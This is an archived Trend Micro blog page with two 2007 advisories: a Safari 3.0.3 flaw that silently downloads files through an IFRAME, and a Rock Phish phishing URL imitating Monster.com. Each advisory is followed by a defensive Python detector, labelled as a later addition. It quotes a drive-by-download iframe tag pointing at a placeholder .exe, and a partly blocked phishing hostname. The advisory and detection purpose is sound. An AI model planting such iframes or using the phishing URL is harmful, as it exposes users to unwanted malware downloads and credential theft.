
Archive for October 8th, 2007


Oct 8
by Lordian Mosuela (Threats Analyst)

A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

<iframe src="http://www.XXXX.com/XXXX.exe" name="iframe" id="iframe"></iframe>

Unlike IE and Firefox, which display an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version displays no notification at all.

A behind-the-scenes look with the Ethereal network analyzer further confirms that the system is indeed being instructed to download the file.

The flaw has clear potential for misuse: a site can place a file on a user's system without consent, which is a violation of user rights. As of this writing, this bug has also been found to work on iPhone 1.0.2.
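The silent download described above is easy to spot in page source once you know what to look for. The following scanner is an added example (not code from the original post or from Trend Micro): it parses fetched HTML, collects every IFRAME and flags those whose src path ends in an executable extension. The extension list and the sample page are constructed for illustration; the placeholder host www.XXXX.com is the one quoted in the post.

```python
"""Flag IFRAME tags whose src points at an executable download.

Added example (not from the original post). A defender can run this over
page source captured by a proxy or crawler to find iframes that reference
binaries, the pattern that Safari 3.0.3 fetched without prompting.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit
import posixpath

# Extensions treated as direct downloads. Assumption: this list is illustrative,
# not exhaustive; extend it to match the platforms you protect.
EXECUTABLE_EXTENSIONS = {".exe", ".msi", ".scr", ".com", ".bat", ".pif", ".dmg", ".pkg"}


class IframeCollector(HTMLParser):
    """Collect the attribute map of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag != "iframe":
            return
        self.iframes.append({k: (v or "") for k, v in attrs})


def is_executable_url(url):
    """True if the URL path ends in a known executable extension (case-insensitive)."""
    path = urlsplit(url.strip()).path
    ext = posixpath.splitext(path)[1].lower()
    return ext in EXECUTABLE_EXTENSIONS


def find_download_iframes(html_text):
    """Return the src of each iframe whose target looks like a binary download."""
    collector = IframeCollector()
    collector.feed(html_text)
    collector.close()
    return [a["src"] for a in collector.iframes
            if "src" in a and is_executable_url(a["src"])]


# Constructed sample page, modelled on the tag quoted in the post.
# The second iframe is benign (an HTML page); the third uses upper-case markup
# and extension to show that matching is case-insensitive.
SAMPLE_HTML = """
<html><body>
<p>Welcome</p>
<iframe src="http://www.XXXX.com/XXXX.exe" name="iframe" id="iframe"></iframe>
<iframe src="http://www.example.com/news.html" width="0" height="0"></iframe>
<IFRAME SRC="http://www.XXXX.com/setup.MSI"></IFRAME>
</body></html>
"""

if __name__ == "__main__":
    for src in find_download_iframes(SAMPLE_HTML):
        print("iframe pointing at executable:", src)
```

Matching on the URL path rather than the raw string avoids false positives from query strings, and the parser approach tolerates attribute order and case, which a plain regular expression on the quoted tag would not.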

Additional information provided by Leander Yu.

Posted in Vulnerabilities

Oct 8
by Macky Cruz (Technical Communications)

It's another game of chance for Monster.com users: TrendLabs has just discovered a suspiciously constructed URL that is possibly involved in a phishing attack against the popular job-hunting site:

  • http://{BLOCKED}-id874926.monster.com.kkkmode.cn/membersdir/employer_form/mydata.aspx

Initial analysis from Joey Costoya of the Trend Micro Incident Response Team (TMIRT) indicates that the link was created using Rock Phish, a well-known phishing toolkit that makes it possible for relatively nontechnical people to create and carry out phishing attempts.

Below is a screenshot of the said phishing page:

{Monster.com phishing page}

It seems the attacks against Monster.com are not over yet. Readers may recall the malware targeting users of the same site covered in an earlier post. Users, especially those who have accounts at Monster.com, should therefore exercise caution when clicking on links found in unsolicited email. Monster.com's Security Center has also posted a notice about avoiding online fraud.
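The URL above relies on a familiar trick: the trusted name monster.com appears as a subdomain of an unrelated registrable domain (kkkmode.cn). The following check is an added example (not code from the original post or from Trend Micro) of how a mail gateway or proxy can flag such hostnames. It assumes a constructed watch list of protected brand domains and approximates the registrable domain as the last two labels, which is a simplification (suffixes such as co.uk need a public suffix list); the first label of the sample URL is a constructed stand-in for the post's {BLOCKED} placeholder.

```python
"""Flag hostnames that embed a protected brand domain under an unrelated registrable domain.

Added example, not from the original post. Assumption: the registrable domain is
approximated as the last two labels (no public-suffix list); a production check
would consult the public suffix list instead.
"""
from urllib.parse import urlsplit

# Constructed watch list of brand domains the gateway protects.
PROTECTED_DOMAINS = {"monster.com"}


def registrable_domain(host):
    """Last two labels of the host (simplification noted above)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def hostname_of(url):
    """Extract the hostname from a URL, tolerating a missing scheme."""
    if "//" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def embedded_brand(host):
    """Return the protected domain a deceptive host embeds, or None if the host is clean."""
    host = host.lower().strip(".")
    reg = registrable_domain(host)
    if reg in PROTECTED_DOMAINS:
        return None  # genuinely under the brand's own domain, e.g. careers.monster.com
    # Only the part left of the registrable domain can carry the deceptive prefix.
    # Hyphens are treated like dots so that "monster-com" is caught as well.
    prefix = host[: -len(reg)].rstrip(".")
    labels = prefix.replace("-", ".").split(".")
    for brand in PROTECTED_DOMAINS:
        brand_labels = brand.split(".")
        n = len(brand_labels)
        for i in range(len(labels) - n + 1):
            if labels[i:i + n] == brand_labels:
                return brand
    return None


def classify_url(url):
    """'suspicious' when the hostname embeds a protected brand, otherwise 'ok'."""
    return "suspicious" if embedded_brand(hostname_of(url)) else "ok"


# Constructed samples: the first mirrors the structure of the URL in the post.
SAMPLE_URLS = [
    "http://blocked-id874926.monster.com.kkkmode.cn/membersdir/employer_form/mydata.aspx",
    "https://careers.monster.com/",
    "http://login.monster-com.example.net/",
    "http://www.example.org/jobs",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(classify_url(url), url)
```

The check deliberately ignores the path and query, since Rock Phish-style kits vary those freely; the hostname's label structure is what gives the page away.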

Posted in Phishing


© Copyright 2008 Trend Micro Inc. All rights reserved.